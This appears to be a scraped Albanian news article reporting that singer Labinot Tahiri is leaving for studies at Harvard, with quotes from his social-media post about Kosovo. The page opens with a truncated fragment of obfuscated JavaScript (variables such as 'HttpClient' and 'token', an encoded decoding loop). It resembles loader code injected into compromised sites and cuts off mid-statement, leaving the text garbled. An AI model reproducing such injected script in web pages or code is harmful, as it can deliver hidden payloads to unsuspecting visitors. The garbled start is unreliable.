;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Labi niset për Harvard!

By

Pak javë më parë, Labinot Tahiri befasoi kur tregoi një vendim të tij për studime në Harvard. E këtë plan tashmë e ka konkretizuar dhe nisja duket të jetë çështje ditësh.

Këngëtari ka treguar në një shkrim në rrjete sociale se asnjëherë nuk e kishte menduar që do e bënte një veprim të tillë për popullin e tij.

Shkuarjen në Harvard, Labi e ka portretizuar si flijim në mënyrë që populli i tij të ketë ditë më të mira. “Edhe unë mund të kënaqem dhe të qëndroj indiferent ndaj ngjarjeve në Kosovën tonë por nuk mundem.” – është shprehur mes tjerash ai.

Ndoshta i dëshpëruar nga situata politike e ditës së sotme, Tahiri ka treguar se mbetet me shpresë duke e kujtuar Qershorin në vitin 1999 se si ishte populli i lumtur kur e prisnim Kosovën drejt ngritjes se saj në Këmbë dhe ditët e Lirisë!

Ndryshe, Labi paraprakisht ka studiuar Shkenca Politike në një prej kolegjeve private në Kosovë. /Prive.al/

Artikuj të ngjashëm